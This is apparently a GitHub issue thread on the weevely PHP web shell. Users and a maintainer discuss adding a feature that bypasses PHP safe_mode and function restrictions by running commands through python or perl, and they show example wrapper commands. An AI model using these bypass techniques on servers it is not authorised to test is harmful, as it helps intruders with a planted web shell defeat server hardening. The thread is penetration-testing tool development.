bypass safe_mode and functions restriction
eltouco72 opened this issue · 6 comments
during pen testing when we can upload weevely shell, sometime the server has PHP in safe mode or restrict some function so weevely can not be in "system shell mode"
but in even in that case, python or perl are sometime installed on the server and can be executed.
I propose an enhancement where when weevely detects safe_mode or restricted function and that python ou perl are available, to execute shell command thru python or perl and not thru php
for instance, in a recent pentest PHP was in safe_mode and safe_mode_exec_dir was restricted to /usr/bin
so command like bash, ls or cat that live in /bin were not possible whereas python and perl were found /usr/bin and didn't have this restriction and could execute anything with os.system('ls -l') for instance.
thanks for the good work, weevely is a nice shell, I wish I had sufficent programming skills to improve it but i can only suggest improvement.
Thanks for the idea, I'll implement it in the next releases.
hello Epinna,
anything new on this ? did you stop this project ?
Hey @eltouco72,
the best thing I can think of is to add a wrapper_function option to shell_php module, expecting a primitive "template", a string with a "INSERT PAYLOAD HERE" marker. This way you could setup the trick you need to bypass safe_mode (which can be many things depending on its configuration).
For exemple one would be able to do :
:shell_php -w "python -c '${command}'" ls -l
# And store its value for the current session
:set shell_php.wrapper_function "python -c '${command}'"
:shell_php ls -lWould you agree on that ?
I'll give that idea a try and make a PR soon.
maybe you could do both ?
Python or Perl are very often installed on Linux system (which means 90% of web servers)
detects if Python or Perl are installed, then in case of safe_mode pass command thru Python or Perl so it will be transparent for weevely user.
if no Python or Perl installed on the target, propose this wrapper to the user.